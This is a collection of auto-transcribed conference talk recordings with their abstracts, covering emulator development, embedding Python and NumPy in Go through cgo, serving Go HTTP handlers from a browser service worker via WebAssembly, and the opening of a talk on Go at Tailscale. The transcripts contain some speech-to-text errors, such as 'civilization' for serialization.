preserved, but also the history and legacy of the systems. Sure, this can be in the form of an emulator, of course, since you'll be able to experience games developed for systems which will be increasingly harder to get a hold of as time passes by, let alone in working condition, but also all forms of documentation play their part in this, like retro computing blogs run by individuals. Furthermore, these systems live on through the efforts of people developing software for them long after they had been discontinued. The description you see here is from a homebrew game called Micro City. It was developed from scratch for the Game Boy and it's possible to play it on an emulator, of course, but also you can download it onto a flash card and play it on an actual Game Boy. The source code for it can be found on GitHub. 
And of course, what enables the development of these homebrew games in the first place is to a great extent the existence of emulators. To wrap it up, writing an emulator is a fun, educational, but at the same time inspiring and humbling journey which when experienced appropriately can push you to become a better engineer. All right, so as we reach the end of the talk, I'd like to also point out that emulator development is more accessible today compared to say 20 years ago. Firstly, computers are faster today when compared to the early 2000s and thus you can potentially write a decently performing emulator in a language that is not C, C++ or RAST. If you do decide to go that way though, say because you are more confident in developing another language, then depending on the system you will want to emulate, you should set the right expectation when it comes to the outcome. And once again, I'm talking about performance here. That being said, it doesn't invalidate how fun and how rewarding the whole journey can be. And secondly and more importantly, the world today is more connected than ever. You can very easily reach out to people or find information you might need. There are numerous communities that you can join and actively participate in, like an emulator development subreddit or a discord server. And people in such enthusiastic communities are generally more than happy to help and to point you to the right direction when necessary. And beyond this, there is really no shortage of resources available for you to get started. So that's all. Have fun. Thank you very much for sticking through. I hope you enjoyed attending the talk. As much as I enjoyed putting it together. And I'd really appreciate if you took a few seconds to complete the short feedback form of this talk. Beyond this, I'll see you next year in Brussels. Hopefully once again in an emulator development everyone. I'm muted again. Okay, great. I like this comment. Let's see, does it work? Does it work? I think we're live and I'm on the screen for some reason. Can you say something? Test, one two? I think we're live. Yeah, we're live. But I think the same issue that Niels had a minute ago that he's on the screen. Yeah, okay. All right. So thank you very much for your talk. It was pretty cool. I love the one on the right. Somebody commented, this talk makes developing an emulator look like a game itself. And I think that's... Yeah, that's one way to look at it actually. It's if you're doing something, it's supposed to be fun. That's what I think. So if it's not fun, I think Steve mentioned earlier that choose a game or a system that you like and you have and relate to otherwise, when you get stuck, you might not want to solve the issues that you might find. So the whole idea is to do something in a context that you enjoy. And I really think that this is something that you... This is a project, potential hobby project that you can do and teach you a lot of stuff. Yeah, okay. Yeah, sorry, I'm a bit distracted. I'm looking at the live feed and I'm looking at whatever, right? Because it's still... It's stuck on me, right? For some reason, things I'm important. So yeah. Okay. Yeah, this is... You guys are doing a lot of the work for us to be able to present this talk. So yeah. This is nothing compared to actually preparing a talk and giving a talk, right? And then getting hate mail from people for giving the talk. I hope I don't get that. I'm also having a look here to see if there are any questions. 
Yeah, we have a couple of questions. But I wanted to start with the question because you were talking about in the old days how it was and it was difficult to get into. But nowadays, it's much easier, of course. And I was wondering if you could give some pointers for resources for people to learn and whatever, right? Something like that. Yeah, I mean, I do have a list of the copy and paste into the room later. The idea that I just pointed out is for people to actually go and search for this stuff. For example, if you go and check in the emulator development subreddit, for sure you will find there are people showing off their new emulator asking for questions. So it's really easy to get started with that. And I think that's the biggest part of this thing, to know that the information is out there, to go get it and get started on your own. But for sure, if anybody wants specific, more concrete info, I do have some links that I can point you to. But generally, the one that I recommend, I think also Steve mentioned again, is go for a chip 8 at first. And that buy went for. And it's a very nice soft landing into this. Yeah, I mean, you mentioned before that in the early 2000s, it might have been a bit more, you know, harder to get into stuff. It might have been, at least in my mind, since emulator developers were kind of a closed loop in the sense that they were the Gandalfs, you know, and we are the common mortals. And it was really, you know, really, hard to say, intimidating. But now, the fact that you have the information out there, you can just get started on your own. Also, you know, just ask people for help. Does it answer your question? Yeah, sorry, sorry, sorry, sorry. I'm still trying to fix the video thing. It does answer my question. I'm trying to fix the video thing. It's not being fixed. So we'll just continue with the questions till somebody tells me how to fix it. But what you just said, because there are a couple of questions that kind of relate to this. Somebody says that chip 8 was your first, what was your second emulator? And what is the most important thing you learned from it? There was no second emulator. I mean, it's something I'm definitely looking into. And actually, what I said about the story is that the way it started is that I was excited about the dev room. And I was trying to think why was I excited about the dev room. And then I thought that I had done that chip 8 interpreted in the past. And actually, you know, what we're discussing behind the scenes actually, this dev room got me excited to look into this again, once again. Now, the most important thing I learned, what I mentioned this slide about appreciating what we have and what we take for granted. And if you program in high level language, you have a lot of a lot of the stuff taken care of for you. You know, you don't have to care about the underlying implementation sometime most of the times. But maybe, so for example, people in the 70s, also in the 80s or in the 90s, they had to, you know, do a lot of kind of very hardcore stuff by today's by today's standards. So I'm really, you know, I really appreciate that. I really appreciate that there is a formation out there that people decided to share it with the world. That's also really cool. And I mean, another thing I did mention that you learn about stuff like the insight of a processor. Most of us maybe learned that in the context of a university course. For me personally, I came from a broader engineering background. 
So I didn't get to do this kind of stuff as in depth. So this kind of project is what really, you know, what made to actually learn more, more about these things. And especially because of my interest in any letter from a long time ago. This was very, you know, a very nice, nice way to, to learn about these things. And I, as I said, it's really learning about these things. It's something that can't push you to think twice. My, my microphone is noisy. No, it's not noisy. Yeah, I was saying that it can make you think twice if you want to, if you, you know, if you're pushing code that might not be up to, up to spec bar to, you know, your standards that other people might be, you know, developing on top of that code, you want to do, you know, it is far as yet to push, push even a bit further to become even better. That's what I, that's what, what was the case in my, you know, in my case. All right. All right. There was another, another question also kind of relates. It's, so why would you suggest for somebody to get into emulation and starting with the, and if somebody starts with that, I think the follow up is should he start with another chip?
|
Even to this day, there's something utterly captivating about bringing to life a piece of software effectively frozen in time, designed to run on what was originally a black box, by means of a device that one uses to check up on cat facts. Adding to this, it can even be enhanced and possibly perform better than its developers ever hoped for. If you also got to play around with your first computer in the early 2000s, chances are that console emulators were amongst the first pieces of software you've ever run on a computer. Submitting this talk was an endeavour to explore this unexplainable (or is it?) fascination by what seems to conceptually be a compatibility layer. More importantly, the talk aims to have you intrigued about emulation development and the scene in general in the year 2021, by presenting the significance of the emulation community in the context of education and history preservation. It will also highlight how emulation development is more accessible today compared to the early days of the likes of PSEmu Pro, Project64 and NO$GMB - thanks, in no small part, to the FOSS community. TLDR: this will focus on the "why" (rather than on the "how") you should have a go at writing your first emulator. Additional info: The intention is to provide people that can relate to the below points... solid programming background and grasp of computer science fundamentals naturally curious about the inner workings of computers a general interest in console history a little too sceptical as to what business they could have entering territory of the emudev Gandalfs of the 2000s that they looked up to during their school years [optional, but desired] having fond memories of their (even-then) ancient Pentium 3 struggling to handle Tekken 3 on bleem! (you get the picture) ... with good reasons as to why dipping their toes in emulation development is worth their time, and how writing an emulator is an awesome all-around learning experience, out of which you'll become a better engineer. Plus, amongst other, to highlight how such a journey is meaningful, rewarding and worthwhile -- as it lies within context you can relate to: seeing your childhood games come to life (or, on the remaining 99% of occasions: using the debugger that you wrote trying to figure out why you can't get past the first screen)
|
10.5446/53654 (DOI)
|
Hi, and welcome to my talk. We're going to talk about how to embed Python in Go with almost no civilization and very little memory. My name is Niky Tebeka. I work and own 353 solutions, where we do some consulting and a lot of training in both Python Go and the scientific Python stack. I've been working with Python for about 24 years and go from the very beginning, 11 years. And I'm also one of the organizers of Go for Con Israel and the Go Israel Meetup, and I used to organize the Python Israel Meetup. So the question is, why? Why do we want to use both Go and Python in the same project? We have Go. It's great language. There's a lot of libraries. So why should we use another language in it? And as Scotty says, use the right tool for the right job. Go is great at high concurrency, at servers, API endpoint. But when it comes to data science, Go is years away from Python. Yes, we have Go now and friends, but it's not the same. The Python ecosystem is much, much richer. And chances are your data science team is working in Python. Converting code from Python back to Go will take time, and it's also a risky operation. So why not enjoy both worlds? We write and do the heavy lifting in Go and use Python for the data science stuff. The question is then, why not RPC? Start a Python server on HTTP or GRPC and then call it from Go. And this is an awesome solution. If you can do that, by all means, go that path. It's much easier. It's much more structured, and you will have way less errors when you do that. But sometimes you have very strict performance requirements. And in these cases, we need to think about something else. Every time you do an RPC call, these RPC calls mean that you need to do civilization, a network call, and then this civilization on the other side, do some work, and then to send back the data, the result, you need to do again civilization, another network call, and another de-civilization. And this takes time. So if you can eliminate that, this can save us a lot of time, and the time spent will be only on the actual work and not the communication. So how are we going to do it? We're going to glue C, we're going to use C as a glue between Python and Go. And we have on the Go side, we have C Go, which we all know. And Python, the Python that we are using is called C Python, because it's Python implemented in C. There are other pythons as well. Right? There's Jython, which is Python written in Java. There is PyPy, which is Python written in Python, and a lot of times it's faster than C Python, and several other ones. The C Python has an extensive C API. Most of the time, people use the C API to write extension to Python. You identify that some code is too slow in Python. You rewrite this code in C using the Python C API, and then you can import it and use it as a regular Python model. But the C API can let you also work on the other direction. You can import Python or embed Python inside an application. And I've done it several times, and it's a great way of adding scripting and dynamic features to your program. And this is what we're going to do. To avoid serialization, we are going to look at some preconditions that help us. We have code that is you're going to use NumPy to do outlier detection. And what is going to help us is that both the GoFloat64 and NumPy's Float64 have the same representation memory. They use the same representation of the floating point number. The second thing is that both NumPy arrays and Go slices are continuous in memory. We don't have gaps. 
So we can pass them around in the underlying representation memory the same way. So let's have a look. First, let's look at the setup. So here's an example code. What we're going to do. We'll start by creating a new outlier object which uses the code from the outlier Python module and the function detect inside it. And we're going to defer the closing of this object and we'll talk about why. Then we're going to get some data, pass it along to the detect method, and get back the indices of the outliers if there are any. And finally, we're going to print them out. If you're going to look at the Python code, it's very short. We calculate the cscore for every element in the array that's coming in. Find out where the elements are more than three, have a cscore of three and bigger, bigger than three, and then we're going to return these indices. So this is the example code, this is the Python code, and the go code that we want to run. In outliers, we start with the new function. So the new function first calls initialize to initialize Python and then it is going to load Python which is loading a Python function and saving it as a go variable. And then we're going to return these outliers. And you can see here that fn is the field that is a Python object. Everything in cpython, including functions, is something called pointer to a py object. So what does initialize do? Initialize is going to use sync.once to make sure that we initialize only once. It is going to call the c function for initializing Python and get there if we have it. And in grudosy, initpython is calling py initialize which initializes Python and then import array which is initializing numpy. The second thing we saw in outliers.go is that we loaded the Python function. When we load the Python function, we need to convert the go strings to c strings. And right away, make sure that we free these c strings. And then we call the c function from our glue code to load this function. And return the function at the end. So here's the load function. It gets a model name and a function name. We convert the name from c string to Python string and the same we do for the function name. Sorry. And we call the py import to import the model. If we cannot import the model, we return null. We turn null in Python indicates an error. That there was some kind of an exception. And then we do get other string to get the function from the model. So we do a decref. Decref means it decrements the reference counter. Python memory management is a reference in counting. Every time you get an object, it has a reference counter that is increased by one and when you're done with it, you should decrease the reference counter. And this, using two systems that each one has its own way of managing memory, this is the most difficult part when you're dealing with these kind of things. And then we return the function. Right. And now we're all set. So we initialize Python, initialize numpy, we loaded the module and we got the pointer to the function. Now we're going to have a look at what happens when we call the tag function all the way from go up to the Python code, down to the Python code. So what are we going to do is we're going to make sure that everything is using the same memory. So we're going to take the slice, the go slice, and we're going to pass it to see just as the address of the underlying array. 
And then from in the C code, we're going to create an umpy array that points looks at the same memory location where the underlying array of the slice is looking to. Okay, so here is our detect function. We convert the float 64 slice to a C double array by taking the address of the first element of the slice and casting it to a C double. And then we call the detect function from the glue C code with our function pointer, the pointer to the Python function that we have from the new the array and how many elements are in the array. In the glue code, what we need to do is take this double array of values and convert it to an umpy array. We tell the umpy what are the dimensions of the array, and we call the py array simple new from data, which tells it create an umpy array looking at these values in memory, it is not going to copy them. Then we need to construct the function argument in Python in the C API, function arguments are passed as a tuple, which is like a slice but immutable, you cannot change it. And here we create a new one and set the first item to our to the array. And then we do Python object, call object to the function that we have, this is passed on line 33, and these arguments to just constructed. Right, and this is going to be basically calling the function detect with data, which is an umpy array. And now, how do we get the data back to go? So what we're going to do here is we're going to do the same thing, we're going to get the underlying memory from the umpy array, we're going to pass it back to go. And now there is a design decision, do we want to keep using the data from the umpy array? But then we need to make sure that once we're done with the umpy array, somehow we're going to free this memory by calling decrypt or, and this is the approach I took, is saying most of the time the number of outliers is small, it's not going to be as big as the array. And this method of keeping the umpy memory is pretty complicated and will make the code complicated. So I'm going to copy over the code from Python to a new slice managed by the go memory, and then free the Python. And this makes it much easier because now I can just return a slice and move on with go as it is without needing to think about freeing and finalizers and many other things that might or might not work as expected. So let's have a look. So in the Gluton C we have a result object, right? So this result object is the umpy array, the indices, which is basically an array of longs, how many indices we found and an indicator, an integer, whether there was an error or not. So we set the object to the umpy array and we convert it to a umpy object, to a sorry to a Python object, right? It was a pyarray object, if you can see it on line 48, and now we convert it to Python object. And this is okay because pyarray object starts with the Python object and then have some extra fields on it. We set the size and this is calling again an umpy function, umpy capi function called pyarray size and then the index says we get the underlying memory again using pyarray.getPTR, getting the pointer to the memory and returning the results. Okay, so now in detect we got the data. We got the result and checking if there is a result, we're going to return an error. Otherwise, we're going to convert the c long pointer to a slice and we're going to do it by a trick of pulling the go compiler. So we set a max size for the return value which is one gigabyte and if the size that we get is more than one gigabyte, we contain an error. 
And then we get an unsafe pointer to the carray and then we cast it to look like it's an array of maximal size at that location in memory. This is not going to allocate a one gigabyte memory in go, just pulling the compiler to think that there is a one gigabyte array starting at that location. And now we create our own slice. This is the one that is going to be managed by go and we're going to copy to the slice up to the size from the array that c returned or that python returned. Okay, so now we have a slice which is managed by go and we return this slice of course. So now we have a slice that is managed by go. So now we can tell python, we're done with what you did, we're done with the memory that you allocated. So we decrement reference counter for the non-pr array that was the result of calling the detect function in the python model and return the indices. And now we have the data. For some bookkeeping, we also have a close and we saw it before on the outliers object and this one is calling py decref on the function itself. So this function object also consume memory and we can free it. So we have our code going all the way down and all the way up. We didn't do any civilization, we use the same underlying memory from here and from there and this is because both numpy and go using the same representation in memory for a float or an integer. And we did very little memory and this is the epsilon memory when we decided that to make the code simpler and easier to use with memory management, we are going to copy the indices from the memory managed by python to the one managed by go. What's left is building. We need to build this code and to build this code, we need to help the cgo to find out things. So first we're going to need to tell it where to find the python headers. If you look at glue. age, we see that we include python. age. So it needs to know where it is. And what we're going to use is a cgo directive. The cgo directive for pkgconfig is calling the pkgconfig utility which is found on most Linux systems and can tell you about where to find header files for various packages. It should tell you also about how to link with various packages but for some reason it didn't do that. So I had to tell cgo also to link with the python library. So this is for the python one and this was pretty easy to get. The problem was the numpy one. So in glue.c we have include of the numpy object and we need to find where the numpy objects and headers are. And I couldn't find a way to do it with pkgconfig or in a static way. The way to do it is to call python or call and ask numpy for a specific function that will tell you where numpy is installed and where to find the header files. So this has to be dynamic and this is not something that is easy to do with the go build system. So what I decided to do is do it outside of the build system. I'm using a make file and I'm calling python and telling it to input numpy and print the numpy get include which tells us where are the include libraries. And then when I'm running the code or building the code I'm using the cgo cflags dash i numpy include. And this is how I'm passing dynamically the location of the numpy header files to the build system or the run system. Another thing I need to do is because I'm doing an import in python, python looking for model where to import models in something called the python path. And I'm adding the current directory where the outliers.py is to the python path so a test will work. 
And finally we can run the tests and we can see that they're passing. Okay so what's left? What's left is one the thread safety of the go routine safety. Python has a global interpreter lock and when you call it from in the c level you need to make sure that you're on the same thread calling python. We can probably add a sync.mutex to our outliers and finish with this issue but maybe there are other things that we need to be aware of. Maybe we need to lock to the OS thread. This is also an option. I would like to have better error recovery. What I'm doing right now is I'm getting the last error from python and returning it as an error. But python can also give you a stuck trace and many other things so maybe I can utilize that to show better errors and maybe do better error recovery in the future. Memory leaks. Every time you have two different systems, each one managing their own memory, this is an option. I think I got all of them but I'm really not sure. So hopefully I'm getting them right. So thank you for listening so far. There is a blog post and this talk is based on this blog post on the other live blog and then later on Chris took it and made an excellent extended blog post on the subject of embedding python. I'd like to thank the folks on the dark arts channel on the go for slack. They helped me a lot in the design and understanding some of the edge cases. And you can find all the code and these slides on GitHub repo for my talks. That's it. Thank you and now it's time for questions.
|
In this talk we'll see how we can call Python function from Go "in memory" and with close to none serialization. Like tools, programming languages tend to solve problems they are designed to. You can use a knife to tighten a screw, but it’s better to use a screwdriver. Plus there is less chance of you getting hurt in the process. The Go programming language shines when writing high throughput services, and Python shines when used for data science. In this talk we'll explore a way to call Python/numpy code from Go in memory using some cgo glue. This approach is fast and risky, use at your own risk.
|
10.5446/53655 (DOI)
|
Hi everybody, my name is Nicolas LePage. I'm a developer at Zenica IT in France. I work mostly with JavaScript and I also like experimenting with Go. This is my first talk in English, so don't be surprised, I'm a little out of practice. Today I'm going to talk about deploying a Go HTTP server in your browser. First you may be wondering why? Why would I want to do that? Well, it could be useful for demonstration purposes. I have this little Go project. It is a command line interface tool which helps me add a text at the bottom or at the top of a JPEG image. And it also has an HTTP subcommand with a form where I can do the same. Select an image and choose some text to add at the top and the bottom. Then the server sends back the image with the text. Now I would like to put up a little demonstration page for my project, but I don't want to actually deploy a Go server for this. So that's how I started wondering if we could deploy a Go HTTP server in a browser. Since Go 1.11, running a program written in Go in a browser is possible if you build it to WebAssembly. You get a WebAssembly binary which can be downloaded and executed by a browser. If you haven't heard about WebAssembly, it uses a portable bytecode format executable by browsers and compiled from higher level languages such as Rust, C, C++, or Go. Of course, Go code executed in a browser has exactly the same limitations as any JavaScript code executed in the same browser. For example, it will not be able to use the OS package to access the client's file system. So it will also not be able to actually start an HTTP server in the browser. However, when an HTTP request is sent from a web page, there are some cases when it will not actually reach the server. One case is when it is intercepted by a service worker, which usually allows web applications to work offline, for example. Now I think you are starting to see where I'm going with this. The question is, will it be possible to execute a Go WebAssembly binary in a service worker and use it to handle HTTP requests? Let's find out. A little warning before we go any further. When you are targeting WebAssembly, you have to make sure all the code you are trying to build is compatible. This means, for example, that you cannot rely on C bindings, system dependencies, or a database server. Also, you have to be careful with Go's standard library, which for a large part can be built to WebAssembly, but will actually panic at runtime. That being said, today I'm going to focus on the HTTP side of things. First, let's have a quick look at how it is possible to respond to an HTTP request from a service worker. When a service worker intercepts an HTTP request, it receives a fetch event. The fetch event contains a request object which holds all the information we need about the request, method, headers, and also the body contents, if any. The fetch event also has a respond with method which accepts one parameter of type response or promise for response. So by reading the request object and building a response object to give to respond with, we are able to respond to an HTTP request from a service worker. However, what we want to do is delegate this task to a Go WebAssembly binary. Now, let's take a step back and review how we usually build an HTTP server in Go. The most straightforward way is to use the HTTP package. First, we define HTTP handlers using handler, which accepts a handler, or handlefunk, which accepts a simple function. 
Indeed, handlers are simple functions, which receive a response writer and a request. So we can already see that this looks a lot like the service worker's fetch event. We may also choose to define handlers using some third-party libraries, such as Gorillamax. Then, once our handlers are defined, in most cases, we will call listen and serve, which we start listening for HTTP requests and use our handlers to respond to these. In our case, we would like to reuse as much as possible of this code we wrote, but use it to respond to a request intercepted by a service worker. Indeed, the handlers are WebAssembly compatible, we can keep and reuse them as they are. So, this is nice, because the handlers are the main part of our code. This is where we declare all the logic. Of course, the one thing we are not going to be able to reuse is the call to listen and serve. But this is okay, because we are going to take a pretty radical shortcut. Usually, when we call listen and serve, it takes care of a lot of things for us under the hood. And for each request, it calls the handler if we gave one in parameter, or default serve mix, which is the default handler. So, what we can actually do is directly call the serve HTTP method of the handler, or of default serve mix. So, let's review the plan. Step one, we intercept the HTTP request in the service worker, and send the JavaScript request object to the WebAssembly binary. Step two, in the WebAssembly binary, we map the JavaScript request into a go request and call the handler. Step three, once the handler has returned, we map the go response into a JavaScript response object, and send it back to the service worker. Step four, in the service worker, we respond to the HTTP request with the JavaScript response object. Now, ideally, we still want to be able to build standard binaries of the server working for Linux or macOS, for example, and also the WebAssembly binary. For this, we can move the listen and serve call into its own file and use build text to tell the group compiler that this file is not compatible with WebAssembly. Then, we can create a specific file for WebAssembly, this time using the file naming convention instead of the build text to tell the compiler that this file is compatible only with WebAssembly. And in this file, we are going to use our own API, which will probably look something like this. So, a wasmhttp.serve function, which needs only the handler parameter. Now, let's dive in the implementation of this serve function. If you remember the step one of the plan, it needs to receive the JavaScript request objects. So, from the JavaScript point of view, the service worker needs to call the WebAssembly binary with each request object. At the moment, go WebAssembly binaries have no way to export functions to our other values to JavaScript. So, in order to work around this, the serve function will have to give the callback function to the service worker. The syschool.js package allows to create such callback functions using func off. Func off takes a go function and creates a JavaScript function from it. The js.value type represents a JavaScript value for go. The first underscore parameter is the this value of the JavaScript function, which isn't useful for us. The callback function needs only the first argument, which is the JavaScript request object. And it will return one value, which will have to be a JavaScript promise for a JavaScript response object. 
Then, the serve function can register the callback with the service worker by calling a set off function, which has to be previously declared in the service worker's global scope. From the service worker's point of view, we are now able to forward the fetch event's request to the WebAssembly binary. In the event handler, we just have to call the go callback function with the fetch event's request. The self variable is a reference to the service worker's global scope. So this is handy for making the set go callback function available for the WebAssembly binary. The actual code is a little more complex because we have to use a promise for the callback. Otherwise, a fetch event might occur before the callback is defined. Step one of the plan is done. Now step two on the go side, let's focus on implementing this callback function. We said that this callback function must return a promise for a JavaScript response object. So let's create a new promise and return it. The new promise function I'm using here is not part of the syscall.js package. It is a utility function to ease the creation of a new JavaScript promise, which can be a little cumbersome using syscall.js. Returning a promise means the callback function is asynchronous. So we need to start a new go routine. Otherwise, the service worker would be blocked. And starting a new go routine actually makes sense because this is how a go HTTP server usually works. It starts a new go routine for each request. And this is it for the callback function. The rest of the work will be done in the new go routine. Now the first thing we need to do in this new go routine is create an instance of a go HTTP request from the JavaScript request object. We could use the new request function from the HTTP package. But if you read carefully this documentation, it says that this function is suitable only for outgoing requests. But what we actually want is to emulate an incoming request. Thankfully, the HTTP test package has the same new request function for creating requests suitable for passing to an HTTP handler. Usually, this is useful for testing purposes. But this is exactly what we want. So let's use this. A new request function takes three parameters. The first two are the request method and URL, which we can simply read from the JavaScript request object properties. The third parameter is going to be a little bit richer. It is an IOR reader for the request body. How are we going to copy the binary data of the request body from JavaScript to go? Really for us, the CiscoJS package has the copybytesToGo function just for that. It takes a byte's slice as destination and a reference to a JavaScript-typed array of unsigned 8-bit integers as source. So this is OK. With just a few more plumbing, you should be able to copy the body content for JavaScript to go. We call the arrayBuffer method of the JavaScript request, which returns a promise on an arrayBuffer. We wait for this promise to be resolved. Then we can wrap the arrayBuffer into an unid8 array. Now we can just create a byte's slice of the same length and finally call copybytesToGo. A byte's buffer will do just fine for the body parameter of new request. Now we have a Go request. The only important information missing on this request is the headers. Headers are stored in a simple map of strings, both in JavaScript and Go, so we just iterate over these and set each header on the Go request. And the Go request is now complete. We are almost done with step 2 of the plan. 
Actually we are already starting step 3. In order to call the handler, we need a value to act as a response writer. For this, we can use the responseRecorder type from the HTTP test package, which implements responseWriter and records the response. And now we are able to call the handler's serveHttp method. Since the handler returns, the result method of the responseRecorder allows us to get the HTTP response written by the handler. Now step 2 is really done. Step 3, we need to build a JavaScript response object from the Go response, in fact the opposite of what we did with the request. In order to build a JavaScript response object, we can use the response constructor which takes two parameters, the responseBody and an init object for additional information such as status code and headers. The first parameters accepts several types. One of them is bufferSource. Actually this is not a real type, but either an array buffer or a typed array. Typed array is fine for us. It will allow us to use the CopyBytesToJS function from the syscall.js package, which works just like CopyBytesToGo, but in the opposite direction. First, we have to read all the responseBody content into a byte slice. Then create a new UIN8 array of the same length as the slice and finally call CopyBytesToJS. In order to build the init object, we can use a map of string to empty interface, which the syscall.js package is able to transform to a new JavaScript object. We only add two values, one for the response status code and one for the headers, for which we can also use a map of string to empty interface. And finally, we can call the response constructor. Back to the GoItin responsible for handling the request, we can finally resolve the promise with the JavaScript response we just built. And we are done with step 3. Now in the ServiceWorker, we know that the go callback function returns a promise for a response. For the step 4, we have to send back the response to the page. For that, we can directly give the return value of the go callback function to the fetch events correspond with method. And we are done. Now question is, does this actually work? Let's find out with a simple example. The index.html page sends a post request to slash api slash hello with a JSON body containing a name property. This request should be handled by the API WebAssembly binary, which must return a JSON response with a message property. And this message will be displayed in an alert. On the go side, we only have one handlefang which decodes the request body, then formats a hello message in the response body. And of course, the call to wasmhttp.sr. We must also add something to block the main routine. Here I used an empty select, which is not pretty, but works. Let's try this out. I'm using a private window to avoid having cache or already registered service workers. Okay. We can already see the requests for the page and for the several JavaScript files of the service worker and a last request for the WebAssembly binary. If we call the API, the alert message is okay. And we can have a look at the request. And we can see that it was handled from the service worker. Okay. Now, let's come back to my little project, which was the caption server. The hello example only uses a server to exchange JSON messages. This time, the WebAssembly binary will actually serve the HTML page containing the form. What we can do is create a small HTML file, which will only be responsible for registering the service worker. 
Once the service worker is activated, it will trigger a reload of the same address, which will now be served from the WebAssembly binary. Let's see if this works. Okay. Let's have a look at the requests. We have our first request for the page and several requests for the service worker files, the WebAssembly binary, and finally, a new request for the page, but this time, served from the service worker. Now, let's try to generate an image. Okay. This one. Any generics. Let's go. So, this is a little slower than the actual server, but it works fine. And if we have a look at the request, we can see that it was served from the service worker as well. Okay. So far, in the examples I have been using, the server is stateless. This means it can be stopped and restarted as much as we want. And this is actually a good thing because the lifecycle of service workers is event-based. The browser will start the service worker only when it is necessary, for example, when a fetch event is received. Then, if no more events are received, after some time, the browser may decide to stop the service worker and kill the WebAssembly binary. So, if my server is stateful, the state will be lost. So, how can we work around this? Well, there is no real solution here. The service worker specification doesn't allow to keep a service worker alive if it has no clients. This means we need at least one page to be loaded in the scope of the service worker if you want to be able to keep it alive. The most we can do is send periodic messages from the page to the service worker in order to keep the browser from stopping the service worker as long as the page is loaded. In summary, it is not really possible to have a stateful server living in a service worker. More information is available on the GitHub project page, including a usage section to help you do the same with your own project. If you give it a try, please let me know, I will be glad to have your feedback. In conclusion, as you would expect, it is not really possible to deploy a Go HTTP server in a browser. However, it is possible to execute Go HTTP handlers in a service worker. Using build conditions allows to reuse most of the code we usually write for building a Go HTTP server, but targeting WebAssembly requires this code to be compatible. And finally, we saw that deploying a long-running stateful server in a service worker is not a good idea because of the lifecycle of service workers. Thank you for listening. Thank you to Fusdame organizers and to the Godavone organizers, and a big thank you to all those who helped me prepare this talk.
|
Have you ever thought to yourself "It would be nice to run this Go HTTP server directly in a browser for demonstration" ? No? Well I have! But it's not possible, right? A Go WebAssembly binary can run in browsers, but cannot serve HTTP... Or could it? Could we run a Go WebAssembly binary into a browser's ServiceWorker, and serve HTTP from it? Well let's find out!
|
10.5446/53656 (DOI)
|
Hello, I'm Brad Fitzpatrick and this is a talk about Go at Talescale. First off I want to say hello again. Long time no see, I haven't been to a conference since Falsedem 2015 and that was actually the trip that I met my wife and so we have been busy raising two boys and they're kind of like the number one reason that I don't get to go to many conferences lately. I guess number two being the pandemic. So anyway, doing it from home and whatever. So for anyone who hasn't met me, hello for the first time. It's a pity that we can't get a beer after that. This is me I guess in 2015 or maybe 2014 at Falsedem. I still kind of look like that except for now I'm giving myself my own pandemic hair cuts and it's just easier to cut it all off. So a bit of background about me. I did LiveJournal back in the day which was kind of one of the first social networking, blogging, forum, commenting sites and it had a bunch of infrastructure and LiveJournal was open source and Memcached was written for LiveJournal was open source and things like OpenID and had a load balancer, couple load balancers that we wrote for it and distributed file system. So it got me into the whole open source world and one of my friends that I was doing the start up with was Evan and I'm going to call him my wise friend Evan. He was always saying wise things like telling me that I should try Debian and telling me that he re-implemented Git and OCaml and Haskell and he had opinions about the storage format and opinions between all the various languages and telling me back in 2006 or 2007-ish that Rust looked interesting and one day he up and quits Linux and he kind of says I'm only using Windows now and he wouldn't tell me why and he couldn't say anything. So I was really curious but I suspected that had something to do with him being a Google and of course he couldn't really say anything. So I joined Google. I wanted to see what all my friends there were doing that were so secretive. It turns out he was working on Chrome and he had to work on Chrome for Windows until he could do Chrome for Linux which is what he really wanted to do. So I joined and he was like, sends me an email and he says hey welcome to Google. It's kind of like, you know, start up is kind of like driving a jet ski but now that you're Google it's kind of like more like driving a giant cargo ship. You know, you've got to like spin the wheel for 15 minutes and nothing happens but you know, once the ship does start moving in the right direction, oh that momentum, those resources. So I got sucked into the Google machine and I worked on some social stuff for a while. I worked on Gmail's backend, the context backend. I worked on Android for a bit. But then I really fell in love with Go and I kind of just got sucked into Go and I did that for 10 years working on the center library and the HTTP in particular and our build system or build and test system. Worked on like releases and kind of all over the place. I guess some dev rally things occasionally. But after 10 years it was kind of time for a change. 12 and a half years at Google was enough. 10 years is kind of my limit doing one thing. So I joined Tailscale. Tailscale is a startup. It is, I was joining right as I turned 40 so people on Hacker News were speculating that I joined because this was my midlife crisis and this was my sports car. So yeah, I guess this is my sports car jet ski and doing a startup again. But I like startups. It's fun. So what is Tailscale? Tailscale I guess you can say is a new style VPN. 
It's not like the VPN that we don't run any exit nodes. So it's not like the type of consumer VPN where you're trying to hide your IP address so you can download something from another company from another country. It's so companies or individuals can have a network of devices that can all talk to each other. So it gives you the illusion that you have one flat network where all of the devices can talk to each other and see each other subject to central ACO policies that you can set. But it's wire guard based and we do all the NAT and firewall traversal automatically so you don't have to configure your network and you don't have to open up firewall ports or anything like that. It just magically always works. Logically, it gives you a network card that has a static IP address that's just for you and for your device and any traffic you want to do over that IP address just works. And so the open source parts are like everything that you run on your machine is open source except for the GUIs on proprietary operating system. So the Android app is fully open source but the iOS app is not. So anyway, that's kind of our policy now that if it's open source, if your operating system is open source, it's also free for individuals. We want to ideally only make money from companies and so far we're doing fine making money from companies. So we don't have to charge individuals who just want to use it with friends and family or to learn, you know, have fun with networking or whatever. So as I said, we run on basically any OS is our goal. We run our primary operating systems are Linux, Windows, Mac, iOS and Android. We also run on things like FreeBSD which is underneath things like PFSense or OPNsense and we run on Synology which is Linux but Linux on a number of architectures and kind of an unusual user space for Linux. Likewise, Edge routers are a number of architectures but also a unique user space. So that kind of seems like a disaster, right? Supporting all these things because we're a small team of people on JetSkis and we don't have like time to have a team of people working on a client for every operating system. So you might say, if only there was some magical way to write cross-platform native applications and it seems like nowadays the industry answer is, well, just use Electron, right? Just take this web browser with all the security restrictions removed and you can write everything in JavaScript. I mean, I guess like maybe that would work. It seems painful but I'm not like a JavaScript person so that is not the route we run. It doesn't seem fun for me but maybe it would work. No, we use Go because we're a bunch of Go people and we use Go for everything. So this talk is first about how you can use Go for everything and you shouldn't be too scared about that. So in Linux, of course, Go runs and that's not really surprising at all. It kind of works in the way you would expect. There's a daemon that runs and that thing runs as root or root-ish with a bunch of capabilities and you can run it under system D or whatever your init process manager of choice is and then there's a CLI that talks to the daemon to do things like reconfigure the network and whatever. You can just go install that stuff. That's all open source. It uses DevNet time to get packets in and out of the kernel and on 